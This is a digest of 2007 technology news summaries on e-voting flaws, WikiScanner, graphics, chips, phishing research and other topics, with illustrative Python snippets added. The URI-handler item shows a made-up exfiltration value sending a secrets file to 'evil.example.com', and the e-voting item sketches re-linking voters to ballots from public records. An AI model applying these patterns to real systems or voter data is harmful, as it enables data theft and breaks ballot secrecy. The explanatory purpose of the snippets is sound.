E-Voting Predicament: Not-So-Secret Ballots
CNet (08/20/07) McCullagh, Declan; Broache, Anne
Ohio's open-records laws, combined with the paper trails produced by
Election Systems & Software (ES&S) voting machines, make it possible to
reconstruct when and how individuals voted, two Ohio activists discovered.
Two documents, a list of voters in the order they voted and a time-stamped
list of actual votes, can be acquired and combined by anyone interested.
Privacy activist James Moyer and fellow activist Jim Cropcho were able to
reconstruct the voting results, including how individuals voted, for a May
2006 vote in Delaware County, Ohio, to extend a property tax to fund mental
retardation services. "I think it's a serious compromise," says Stanford
University computer science professor David Dill. "We have a system that's
very much based on secret ballots. If you have something where voters are
involuntarily revealing their votes, it's a very bad practice." Patrick
Gallaway, communications director for Ohio Secretary of State Jennifer
Brunner, says Brunner is already planning a "comprehensive" review of
e-voting machines as part of a pledge she made during her campaign. Now
the review will likely include a look at the ES&S privacy issue as well.
ES&S spokeswoman Jill Friedman-Wilson downplays the privacy concerns,
saying it would be very difficult to connect the sign-in order with the
voting timestamps, and adds that Moyer's and Cropcho's analysis is "fatally
flawed" because it does not account for time delays between signing in and
casting a vote. Computer scientists say restricting the public's access to
time-stamped e-voting paper trails is insufficient; they suggest deleting
the time stamps, not recording the order in which people voted, and adding
a paper cutter and shuffler to randomize the order in which the physical
audit trail is stored. For information regarding ACM's e-voting
activities, visit http://www.acm.org/usacm.
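The linkage the activists exploited amounts to a sorted join of two public
lists. Below is a minimal Python sketch with invented names, times, and
votes; note that it assumes voters cast ballots in the order they signed
in, which is precisely the simplification Friedman-Wilson disputes.

    # Hypothetical stand-ins for the two public records.
    sign_in_order = ["Voter A", "Voter B", "Voter C"]     # poll-book order
    timestamped_ballots = [("09:31", "Yes"), ("09:02", "Yes"),
                           ("09:14", "No")]               # (time, vote)

    # Sorting ballots by time and pairing them with the sign-in list
    # re-links each voter to a ballot -- the heart of the privacy flaw.
    for voter, (when, choice) in zip(sign_in_order,
                                     sorted(timestamped_ballots)):
        print(f"{voter} cast {choice!r} at {when}")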
Next-Dimension Digital
San Diego Union-Tribune (08/20/07) Sidener, Jonathan
Attendees at ACM's SIGGRAPH conference were able to view and experience
some of the most advanced graphics technologies in development. One
possible future replacement for the television is based on holographic
technology: a display that showed a small black-and-white jogger running in
place inside a glass cube, which viewers could walk around to see the
jogger from every side. Another technology allowed people to place their hand in a box
with multiple cameras to create a virtual copy of their hand that could be
used to manipulate a 3D jack-in-the-box. A special flat-panel television
that displayed 3D images, without requiring the viewers to wear special
glasses, was also on display, as was a glove that gave the user the feeling
of weight and resistance when manipulating objects with a robotic hand.
Although cost is a big factor holding back these technologies, the creators
of the holographic jogger (the University of Southern California's
Institute for Creative Technologies, Fakespace Labs, and Sony) say that if
hardware prices continue to fall at current rates, such technologies could
be available to consumers in 10 years. The holographic jogger, known as an
"interactive 360-degree light field display," uses a modified digital
projector firing 5,000 frames per second and a rapidly spinning mirror to
create the walk-around 3D image. The researchers say the technology could
easily be scaled up from the small black-and-white video to larger,
full-color video.
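The article's 5,000 frames-per-second figure hints at how the display
divides views around the cube. A back-of-the-envelope Python calculation,
assuming a mirror spin rate of 20 revolutions per second (a plausible
value the article does not give):

    # Back-of-the-envelope: distinct viewpoints per mirror revolution.
    frames_per_second = 5000          # figure from the article
    mirror_revs_per_second = 20       # assumption, not from the article

    views_per_revolution = frames_per_second / mirror_revs_per_second
    degrees_per_view = 360 / views_per_revolution
    print(f"{views_per_revolution:.0f} views/rev, "
          f"one view every {degrees_per_view:.2f} degrees")
    # -> 250 views/rev, one view every 1.44 degrees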
Lifting Corporate Fingerprints From the Editing of
Wikipedia
New York Times (08/19/07) P. 1; Hafner, Katie
Computer science graduate student Virgil Griffith's new Web site,
WikiScanner, can track where Wikipedia article edits originate, and it has
exposed the fact that many companies edit their own Wikipedia pages. For
example, SeaWorld's Wikipedia page
was edited last year to change the word "Orcas" to "killer whales" because
it was claimed to be a more accurate term for the animals. A paragraph
criticizing SeaWorld's treatment of sea animals was also removed. It has
been discovered that those changes came from a computer at Anheuser-Busch,
SeaWorld's owner. In 2004, someone at ExxonMobil edited information on the
1989 Exxon Valdez oil spill, downplaying its impact on the area's wildlife
and highlighting the compensation payments the company made. Overall,
Internet experts are glad WikiScanner is tracking
article edits. "I'm very glad that this has been exposed," says University
of Michigan Law School visiting professor Susan P. Crawford. "Wikipedia is
a reliable first stop for getting information about a huge variety of
things, and it shouldn't be manipulated as a public relations arm of major
companies." Jimmy Wales, founder of the Wikimedia Foundation, which runs
Wikipedia, says WikiScanner is a very clever idea, and that he is
considering some changes to Wikipedia that would help users better
understand what information about them is recorded. "When someone clicks
on 'edit,' it would be interesting if we could say, 'Hi, thank you for
editing. We see you're logged in from The New York Times. Keep in mind
that we know that, and it's public information,'" Wales says. "That might
make them stop and think."
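At its core, WikiScanner cross-references the IP addresses Wikipedia
records for anonymous edits against databases of which organizations own
which address blocks. A minimal Python sketch of that lookup, with
invented address blocks and edits:

    import ipaddress

    org_blocks = {                       # hypothetical ownership data
        "192.0.2.0/24": "Example Corp",
        "198.51.100.0/24": "Example University",
    }
    anonymous_edits = [("192.0.2.17", "SeaWorld"),
                       ("203.0.113.5", "Killer whale")]

    for ip, article in anonymous_edits:
        addr = ipaddress.ip_address(ip)
        # Find the first registered block containing this address.
        owner = next((org for block, org in org_blocks.items()
                      if addr in ipaddress.ip_network(block)), "unknown")
        print(f"{ip} edited '{article}' -> {owner}")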
Voting Machine Hackers--UCSB Team Breaks Into Counting
Device
Pacific Coast Business Times (08/16/07) Nellis, Stephen
A successful attempt by a team of University of California, Santa Barbara
computer scientists to hack an electronic voting machine persuaded
California Secretary of State Debra Bowen to ban the machine's use in
state elections. The team demonstrated that with
enough know-how, dedicated attackers could compromise e-voting systems and
fix elections. The machine the UCSB team tested was manufactured by
Sequoia, and the researchers ascertained that the device was both
physically and electronically exploitable. UCSB professor Richard Kemmerer
said crafting the malicious software to infect the system would take
considerable skill, but very little training was necessary to launch the
hacks. He added that the team was able to compromise the voting system
without access to source code. UCSB doctoral student William Robertson
noted that while access to the central vote-counting server is supposed to
be closely guarded, "in practice, it's often the case that isn't observed."
The hackers also discovered that they could modify the machines by
swapping initialization cartridges with bogus cartridges without breaching
seals on the edges. Not even Sequoia's recommended security protocols
prevented the team from cracking the e-voting system. UCSB computer
science professor Giovanni Vigna observed that such election tampering
would not be detectable even with California's mandatory paper trail.
Chipmakers Aim to Unclog Data Paths
CNet (08/19/07) Kanellos, Michael
Processor speed and transistor counts have steadily increased for the past
few decades, but the buses and interconnects that link chips advance at a
much slower rate, creating data backups that slow overall computing speed. The
fundamental limitation of a CPU is no longer performance but input/output,
says Sun Microsystems' Andy Bechtolsheim. Sun is currently developing a
technology known as proximity communication, which allows different chips
to communicate without wires simply by being close to one another. Intel
has also announced a possible solution: an 80-core chip that uses an
embedded network to link its cores, which the company says will be ready
in five years.
Conceptually similar to Intel's chip is Tile64, a 64-core processor from
Tilera. Tilera's chip is available now, and although it uses conventional
memory controllers, the chip consists of small, individual tiles. Each
tile has a RISC processing core and a switch that can send data in four
directions. The switches form a mesh network that allows the tiles to
communicate with one another. The mesh is divided into as many as five layers,
depending on the type of transaction. One layer manages cache-to-cache
transfers, while another is dedicated to streaming data. Experts say that
distributed networks of slower processors such as Tile64 can process tasks
faster while consuming less energy than conventional chips. Tilera's Anant
Agarwal says these types of chips will be used by firewalls, spam blockers,
video-on-demand systems, high-definition video, security systems, and
videoconferencing systems. "The processor is becoming more and more
anonymous, and the system is becoming more and more important," Agarwal
says. "The processor is the new transistor."
Cognitive Science Initiative Encapsulates
Expertise
EE Times (08/16/07) Johnson, Colin
Sandia National Laboratories is striving to improve the performance of
soldiers through knowledge augmentation and cognitive models that will give
them an advantage by predicting the enemies' strategies. "We knew that to
model humans on our side or the threat side, we had to have higher fidelity
in our cognitive models," says John Wagner, manager of the Cognitive and
Exploratory Systems and Simulations Department at Sandia National
Laboratories. "We needed models that really behaved as humans behave."
Sandia says it has developed a cognitive model that can predict any
person's behavior by interpreting text about them, such as their daily
activities and travel records, information that can be gathered from public
records, the Internet, and private databases. The cognitive models are
intended to encapsulate the expertise of specialists, improve the training
experience, and reduce the time required to become competent in new skills.
Instead of a traditional rule-based expert system, Sandia used
pattern-based artificial intelligence that uses semantic networks to store
knowledge and statistics. The researchers also included simulations of
fatigue and of emotion so that the models would feel as humans feel. One
of the first goals the initiative hopes to achieve is improving the
training experience of new military recruits. "Our hypothesis is that if
we build a cognitive model of a novice and we compare it to the cognitive
model of an expert, then we will be able to tailor the training experiences
for each individual," says Wagner.
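The article contrasts rule-based expert systems with semantic networks
that store weighted associations. A toy Python sketch of spreading
activation over such a network; the concepts and weights are invented
purely for illustration.

    # A toy semantic network: weighted links between concepts rather
    # than if-then rules. Structure and weights are made up.
    semantic_net = {
        "convoy": [("route", 0.9), ("checkpoint", 0.7)],
        "checkpoint": [("delay", 0.8), ("inspection", 0.6)],
        "route": [("bridge", 0.5)],
    }

    def activate(concept, strength=1.0, depth=2):
        """Spread activation through weighted associations."""
        if depth == 0 or concept not in semantic_net:
            return {}
        activated = {}
        for neighbor, weight in semantic_net[concept]:
            activated[neighbor] = strength * weight
            deeper = activate(neighbor, strength * weight, depth - 1)
            for k, v in deeper.items():
                activated[k] = max(activated.get(k, 0), v)
        return activated

    print(activate("convoy"))
    # -> route 0.9, checkpoint 0.7, bridge 0.45, delay 0.56, ...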
Net Capacity: Time to Widen the Road?
TechNewsWorld (08/17/07) Mello, John P. Jr.
The Internet's infrastructure will need upgrading in order to meet the
growing demand for capacity, but that time is still some way off, say
experts. Nevertheless, as the growth in demand continues to outpace the
growth in capacity, new technologies and techniques will eventually be
needed. TeleGeography Research reports that during the 2004-2006 period,
worldwide Internet traffic grew at a higher rate than capacity improved.
However, capacity growth has outstripped traffic growth so far this year. "This
tends to be the kind of thing that's very cyclical," says TeleGeography
analyst Eric Schoonover. "Traffic will grow faster one year and capacity
doesn't grow very fast, then the next year capacity will grow to compensate
for the fast traffic growth in the previous year." Schoonover points out
that 12 years ago Internet traffic was growing at a rate of 100 percent a
year, but that has since dropped off to about 50 percent annually. Some
analysts and organizations remain concerned that demand could eventually
exceed capacity. "With YouTube and dozens of imitators generating over 100
million user-generated videos a day, today's Internet traffic is piling up
rapidly in a non-stop 'digital rush hour' jam that could wind up in
gridlock," the New Millennium Research Council stated in a report on
Internet traffic and capacity. Schoonover, however, remains skeptical. "I
don't foresee that," Schoonover says. "As demand increases and more
high-capacity applications come online, the carriers will learn how to deal
with that." Technology and techniques such as content delivery networks
and traffic shaping are being deployed and giving carriers better control
over traffic and how it affects the network, Schoonover adds.
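Schoonover's growth figures are easier to compare as doubling times,
computed here in Python from the rates the article cites:

    # How quickly traffic doubles at 100% vs. 50% annual growth.
    import math

    for annual_growth in (1.00, 0.50):
        doubling_years = math.log(2) / math.log(1 + annual_growth)
        print(f"{annual_growth:.0%} growth -> doubles every "
              f"{doubling_years:.1f} years")
    # 100% growth -> doubles every 1.0 years
    # 50% growth  -> doubles every 1.7 years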
New URI Browser Flaws Worse Than First Thought
IDG News Service (08/15/07) McMillan, Robert
Security researchers Billy Rios and Nathan McFetters say they have found a
flaw in Windows' Uniform Resource Identifier (URI) protocol handler
technology that would allow an attacker to run unauthorized software on a
victim's PC and to steal data from the computer. Rios and McFetters call
such an attack a "functionality-based exploitation" because attackers
simply misuse the legitimate features of software that is launched by the
URI protocol handler. "It is possible through the URI to actually steal
content from the user's machine and upload that content to a remote server
of the attacker's choice," says McFetters. "This is all through
functionality that the application provides." Rios and McFetters will not
name the company responsible for the software, though they do plan on
releasing the results of their research once the vendor has had a chance to
fix the problem. Functionality-based exploitations may be the beginning of
a new era of problems that are only just starting to be examined by
security professionals. "It's a hacker's dream and programmer's
nightmare," says Shavlik Technologies chief security architect Eric
Schultze. "I think over the next six to nine months, hackers are going to
find lots of ways to exploit standard applications to do nonstandard
functions." Software developers released URI protocol names so users could
launch programs from a browser, but they did not properly explore how they
could be misused by attackers, McFetters says. Microsoft is working to
educate users and developers about URI security problems, but Microsoft
security program manager Mark Griesi says there is only so much Microsoft
can do; security is an industry-wide responsibility, and individual
developers need to take on more of it.
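Rios and McFetters are withholding specifics, so the Python sketch below
illustrates only the general class of flaw: a handler for a made-up
myapp:// scheme that trusts whatever parameters arrive from a web page.
The scheme, parameters, and upload feature are all invented.

    # A deliberately naive URI handler: legitimate functionality driven
    # by attacker-chosen values -- "functionality-based exploitation."
    from urllib.parse import urlparse, parse_qs

    def handle_uri(uri):
        """Dispatch a myapp:// URI the way a careless handler might."""
        parsed = urlparse(uri)
        params = parse_qs(parsed.query)
        if parsed.netloc == "upload":
            path = params["file"][0]      # attacker-controlled
            server = params["to"][0]      # attacker-controlled
            print(f"Would upload {path} to {server}")

    handle_uri("myapp://upload?file=C:/secrets.txt&to=evil.example.com")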
Wikinews Interviews World Wide Web Co-Inventor Robert
Cailliau
Wikinews (08/16/07)
Dr. Robert Cailliau, who invented the World Wide Web with Sir Tim
Berners-Lee, says in an interview that he did not foresee the indexing of
data on the Internet by search engines, although he notes that "search
engines do not let you find your way in the Web: they give you a reference,
not a path to follow to get there." Cailliau says the international World
Wide Web conferences serve as forums for the exchange of knowledge. "The
conferences ... I saw as the 'state' of 'laymen'; you had freedom of
expression and could propose the most wild schemes," he recalls. Cailliau
doubts that the Web has changed much fundamentally since the 1990s, but he
thinks the Web explosion transpired too quickly with too many developers
going off on too many tangents. "It would have been better if we had more
time to build on our ideas before letting the beast loose," Cailliau says.
He believes most average Web surfers will not employ grid computing, and is
concerned that most people do not bother to back up their data and only use
their computer as a tool for accessing the Internet, when in fact it is
vital that people know how their data is managed, by whom, where, and with
what assurances. Cailliau says he is not comfortable with having data
controlled by unregulated private companies. He sees Wikipedia as a
valuable resource, commenting that many complaints about the online
encyclopedia are borne out of jealousy and intolerance. Cailliau has
issues with the Semantic Web concept because he feels such a framework
opens up the potential for abuse and deception. "I would like to have a
good semantic Web," Cailliau says. However, he believes that it's "a
little early to use intelligent machinery. Before we reach artificial
intelligence we need to cross the desert of the half-witted machines. And
you have no idea how 'half witted' machines can be." Although Cailliau
says he is concerned that the Web's future could resemble "The Matrix," he
says Web 2.0 is a good trend that demonstrates the Web's biggest
strength.
Some Day, We May Compute With Atoms
Baltimore Sun (08/19/07) P. 1F; O'Brien, Dennis
National Institute of Standards and Technology researchers, led by Nobel
Prize-winning physicist Bill Phillips, have built a laser-cooled atom
chiller with magnets and a vacuum-sealed chamber. The atom chiller allows
the researchers to superchill and manipulate thousands of atoms, creating a
primitive information exchange that could be a precursor to quantum
computing. Researcher Ben Brown calls the atom chiller a "rat's nest" of
wires that looks like a science-fiction prop, and Phillips proudly calls the
machine "a monstrosity." Brown says researchers are taking multiple
approaches toward the development of quantum computing, including
manipulating particles of light and working with electrons. Every approach
uses two properties unique to quantum mechanics: that quantum bits of
information, or qubits, can exist in a "superposition" state, acting as
both a 1 and a 0, which makes it possible to perform multiple calculations
at once; and that when two or more qubits become entangled, their properties link up.
Achieving linked qubits, known as entanglement, is difficult and so far it
has been impossible for entangled particles to survive long enough to
perform calculations. When qubits are near each other, it becomes harder to
manipulate one without affecting any qubits nearby and breaking the
entanglement. NIST's breakthrough is the latest development in a
six-year-old effort to use lasers to trap and control atoms as a first step
toward a quantum computer. In the next step of the project, the NIST
researchers will try to improve the process and separate the entangled
atoms so they can be manipulated individually. "It's analogous to making a
transistor," says Patricia J. Lee, a co-author of the NIST paper on the
project. "There is a tremendous potential, but we don't know what the end
product will look like, or how long it will take to get there."
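The two properties are easy to see numerically. This small NumPy sketch
builds a two-qubit entangled state; it is a classroom illustration, not a
model of NIST's neutral-atom apparatus.

    # Two qubits as a 4-amplitude state vector.
    import numpy as np

    H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)     # Hadamard gate
    CNOT = np.array([[1, 0, 0, 0], [0, 1, 0, 0],
                     [0, 0, 0, 1], [0, 0, 1, 0]])
    I = np.eye(2)

    state = np.array([1, 0, 0, 0])                   # |00>
    state = np.kron(H, I) @ state                    # superpose qubit 0
    state = CNOT @ state                             # entangle the pair

    print(np.round(state, 3))
    # [0.707 0. 0. 0.707]: measuring either qubit fixes the other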
Teen Girls Play With Technology at IBM Camp
eWeek (08/17/07) Nobel, Carmen
Organizers of IBM's EX.I.T.E. (Exploring Interests in Technology and
Engineering) program say recruiting efforts continue to improve. The
recent camp in Cambridge, Mass., drew 45 applicants for 30 spaces. Like
the other 52 EX.I.T.E. programs around the world, including 15 more in
North America, the Cambridge event is designed to pique the interest of
girls in seventh and eighth grade in information technology through various
activities during a week-long day camp that exposes them to what it is like
to work in the industry. The girls made "binary bracelets," used a PC and
light detectors to program Lego robots, learned about project management by
playing a team-building game in the Second Life virtual world, and made
bubble gum and learned how to market it globally. Girls are unlikely to be
drawn to technology for the sake of technology, so the program tries to
incorporate activities that show them how technology can make a difference
for humanity, says IBM's Cathleen Finn. The girls gain a mentor for the
upcoming school year who will keep in touch via email and continue to fuel
their interest in technology. Wendy Page, a software manager at IBM
Rational in Lexington, Mass., who has served as a mentor, says the prospect
of global travel can help entice some girls to pursue a technology career.
"You have to get them where their interests lie," says Page.
NCAR Adds Resources to TeraGrid
University Corporation for Atmospheric Research (08/09/07) Drummond,
Rachael
The National Center for Atmospheric Research (NCAR) has made its
2048-processor BlueGene/L system available to the TeraGrid, the nation's
most comprehensive and advanced infrastructure for open scientific
research. NCAR plans to provide up to 4.5 million processor-hours annually
to researchers with grants from the National Science Foundation. "We are
excited to be at a point where all our hard work and preparation pays off,
and to provide the TeraGrid community with access to this valuable
collaborative resource," says NCAR TeraGrid principal investigator Richard
Loft. NCAR will also test several experimental systems and services on
TeraGrid, including wide-area versions of general parallel file systems,
and a remote data visualization capability based on the VAPOR tool, an open
source application sponsored by NSF and developed by NCAR, the University
of California, Davis, and Ohio State University. NCAR's BlueGene/L system
will be the second BlueGene/L system on the TeraGrid network. With the new
addition, the TeraGrid will have more than 250 teraflops of computing power
and more than 30 petabytes of online and archival data storage with the
ability to rapidly access and retrieve data over high-performance
networks.
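For scale, the 4.5 million processor-hours can be set against the
machine's theoretical annual capacity; the share computed below is our
inference, not a figure from the announcement.

    # Rough upper bound on BlueGene/L's annual processor-hours.
    processors = 2048
    hours_per_year = 365 * 24

    capacity = processors * hours_per_year     # ~17.9M processor-hours
    share = 4_500_000 / capacity
    print(f"capacity ~ {capacity/1e6:.1f}M hours/yr; "
          f"TeraGrid share ~ {share:.0%}")
    # capacity ~ 17.9M hours/yr; TeraGrid share ~ 25%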
3D Models Provide Virtual Approach to Plant
Optimisation
EUREKA (08/07/07)
Currently, farmers and commercial nurseries must grow crops in real time,
experimenting with irrigation, spraying, temperature, and nutrients to
find the optimal growing conditions. A new computer model that combines
computer science, biochemistry, and horticulture offers a much faster and
more exact picture of plant behavior and growing conditions. The computer
model is the result of the EUREKA E!
2544 PLANTS project, run by EUREKA, a European network for market-oriented
industrial research, development, and innovation. The computer model will
allow farmers to make better use of resources, produce better and less
expensive food, and learn more effective crop management. "Plants use
simple principles of component behavior and they interact by competing for
internal and external resources," says Dr. Lubo Jankovic of InteSys, the
project's lead partner. For the project, an analog computer model was developed
using data from the growth of real plants; two parameters, temperature and
radiation, were selected to be the focus of the study. The result is a 3D
model that allows the researchers, and farmers, to see the effect changing
one of the parameters would have on the plant. The next step of the
project will be to create a model for "open-air" crops, specifically
potatoes and sugar beets. Janneke Hadders of Dacom Plant-Service, a
partner in the project, says the group expects to have results within one
or two years.
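The project's model is far richer, but the "change a parameter, see the
effect" idea can be sketched with a toy two-parameter growth function in
Python; the functional form and constants below are invented purely for
illustration.

    # Toy growth index as a function of the study's two parameters.
    def daily_growth(temp_c, radiation):
        """Peaks near an assumed optimum temperature; rises with light."""
        temp_factor = max(0.0, 1 - ((temp_c - 22) / 12) ** 2)
        return temp_factor * radiation

    for temp in (14, 22, 30):
        print(f"{temp} C -> growth index "
              f"{daily_growth(temp, radiation=1.0):.2f}")
    # 14 C -> 0.56, 22 C -> 1.00, 30 C -> 0.56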
Phishing Researcher 'Targets' the Unsuspecting
Network World (08/13/07) Vol. 24, No. 31, P. 26; Brodkin, Jon
Indiana University professor and cybersecurity researcher Markus Jakobsson
launches innocuous attacks on unsuspecting Web surfers as part of an effort
to discover what scams people fall prey to and to identify potential new
phishing tactics. He argues that such experiments are valuable in figuring
out which phishing countermeasures are and are not effective, and
anticipating trends by discovering as-yet unexploited human
vulnerabilities. It is critical to Jakobsson's experiments that his
research subjects remain unaware of their participation to make the results
as authentic as possible. Victims of online attacks frequently disclose
sensitive information or have their computers hijacked by hackers, and one
of Jakobsson's tests revealed that efforts to educate the public about the
hazards of online attacks are inadequate. One of his findings indicated
that people are willing to respond to bogus emails if the hacker correctly
identifies the first four digits of their credit card numbers. In another
experiment, in which email addresses were targeted from a social networking
site that listed political affiliations, Jakobsson observed that people on
the far right and far left were more susceptible to phishing emails than
people in the middle. Some of the people and institutions Jakobsson has
used as guinea pigs, such as eBay, appreciate the insights he has uncovered
and have applied them to improve their security protocols.
Jakobsson and colleagues also launched a phishing attack on unsuspecting
students at IU. The results of this experiment can be found in the October
2007 issue of Communications of the ACM.
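The first-four-digits finding is less mysterious once you recall that a
card number's leading digits form the issuer identification number, shared
by every card the issuer prints; an attacker who guesses the victim's bank
gets those digits for free. A sketch with invented prefixes:

    # Why "knows your first four digits" is weak authentication.
    issuer_prefixes = {
        "Example Bank Visa": "4123",      # hypothetical prefix
        "Example Credit Union": "5456",   # hypothetical prefix
    }

    def plausible_first_four(victims_bank):
        """An attacker targeting one bank's customers guesses its prefix."""
        return issuer_prefixes.get(victims_bank)

    print(plausible_first_four("Example Bank Visa"))   # -> '4123'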
Can a Government Remotely Detect a Terrorist's
Thoughts?
New Scientist (08/11/07) Vol. 195, No. 2616, P. 24; Marks, Paul
The U.S. Homeland Security Department's Project Hostile Intent (PHI) has
the ambitious goal of detecting "current or future hostile intentions"
among the 400 million people who enter the country each year through remote
behavior analysis systems, according to DHS representative Larry Orluskie.
He explains that PHI intends to identify physical markers (blood pressure,
heartbeat, facial expressions, etc.) associated with hostility or the
desire to deceive, and apply this knowledge toward the development of
"real-time, culturally independent, non-invasive sensors" and software that
can spot such behaviors. Such sensors could include infrared light, heart
rate and respiration sensors, eye tracking, laser, audio, and video. For
four years, the U.S. Transportation Security Administration has been using
the Screening Passengers through Observation Techniques (SPOT) program to
detect suspicious people through study of micro-expressions--involuntary
facial telltales that indicate attempts to deceive--but the process is
costly and arduous, and is not something a baggage screener or customs
official can do in addition to their regular duties. The automation of the
SPOT program, with computers instead of people screening for
micro-expressions and other suspicious bodily indicators, is the impetus
behind PHI. Experts doubt that such capability could be accomplished by
the end of the decade, if at all, and are skeptical that such systems could
identify hostile micro-expressions in a potential terrorist, given the lack
of knowledge about and complexity of such expressions. Another unknown
factor is whether such signs could be spotted hours or even weeks before a
terrorist incident. There is also the danger that innocents who are highly
emotional or aggravated due to stress might be flagged as potential
terrorists.
Cracking the Cube
Science News (08/11/07) Vol. 172, No. 6
Northeastern University computer scientist Daniel Kunkle has developed
computer algorithms demonstrating that a Rubik's Cube in any configuration
can be solved in 26 steps or fewer. He says the methods he worked out with advisor
Gene Cooperman "can be applied to any combinatorial problem that you want
to solve." Such problems could range from ascertaining how proteins will
fold to scheduling air flights to playing checkers or chess. The results
of Kunkle and Cooperman's work were detailed at the International Symposium
on Symbolic and Algebraic Computation in Ontario. Their method involved
brute-force calculations by a supercomputer, and Kunkle and Cooperman
devised techniques to store data in exactly the order the system would
later need it, enabling the computer to read the data off the drive without
performing a search. It is the researchers' ambition to reduce the maximum
number of steps needed to solve a Rubik's Cube to 25; many researchers
believe that any configuration can be solved in just 20 steps, but no one
has proved that yet.
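Kunkle and Cooperman's result is a bound on the diameter of an enormous
state graph. For a toy puzzle, the same question fits in a plain
breadth-first search, sketched below in Python; their disk-based
techniques for the cube's 43 quintillion states are far more involved.

    # God's-number analog for a toy puzzle: permutations of "ABCD"
    # under two moves, explored by breadth-first search.
    from collections import deque

    def moves(state):
        yield state[1] + state[0] + state[2:]   # swap first two letters
        yield state[1:] + state[0]              # rotate left

    def diameter(start="ABCD"):
        depth = {start: 0}
        queue = deque([start])
        while queue:
            s = queue.popleft()
            for t in moves(s):
                if t not in depth:
                    depth[t] = depth[s] + 1
                    queue.append(t)
        return max(depth.values()), len(depth)

    print(diameter())   # (worst-case moves needed, 24 reachable states)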
Translation Tools: New Approaches to an Old
Discipline
Computerworld (08/13/07) Vol. 41, No. 33, P. 30; Anthes, Gary
Language translation software can greatly enhance productivity with the
right combination of discrimination and preparation, and researchers say
new translation strategies are improving tool performance enormously.
Since Ford Motor started using machine translation software nine years ago,
it has translated 5 million automobile assembly instructions into multiple
languages. In this process, engineers write instructions in English, and
an in-house AI program parses those instructions into unambiguous
directions, which are stored as records in a translation database. The
Systran software uses rules-based translation,
which utilizes bilingual dictionaries mated with electronic style guides
featuring rules for usage and grammar, along with "translation memory"
databases of previously translated text represented by source and target
sentence pairs. Meanwhile, statistical machine translation "trains"
software on collections of documents and their translations. Large volumes
of documents are necessary for statistical machine translation, but
grammatical rules, bilingual dictionaries, and translation memories are
unnecessary. "The new direction in the research community is to see how
you can combine these purely statistical techniques with some linguistic
knowledge," says Microsoft researcher Steve Richardson. "It's modeling the
rules with the statistical methods." Automated translation software is
most suitable in situations where translations need only be adequate
rather than perfect, and Richardson believes practical translation milestones will be
accomplished through the creation of systems that are embedded within the
workflows of user organizations. An increase in translation system
sophistication and complexity is being facilitated by the combination of
complementary rules- and/or statistics-based machine translation and
translation memories, according to researchers.
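A "translation memory" is essentially a store of source/target sentence
pairs queried by similarity. A minimal Python sketch with invented pairs
and an assumed match threshold:

    # Fuzzy lookup against previously approved translations.
    import difflib

    memory = {  # source sentence -> stored translation (invented)
        "Tighten the bolt to 20 Nm.": "Serrez le boulon à 20 Nm.",
        "Disconnect the battery.": "Débranchez la batterie.",
    }

    def tm_lookup(sentence, threshold=0.8):
        """Return the stored translation of the closest source match."""
        match = difflib.get_close_matches(sentence, list(memory),
                                          n=1, cutoff=threshold)
        return memory[match[0]] if match else None

    print(tm_lookup("Tighten the bolt to 25 Nm."))
    # -> 'Serrez le boulon à 20 Nm.' (a fuzzy match a human must review)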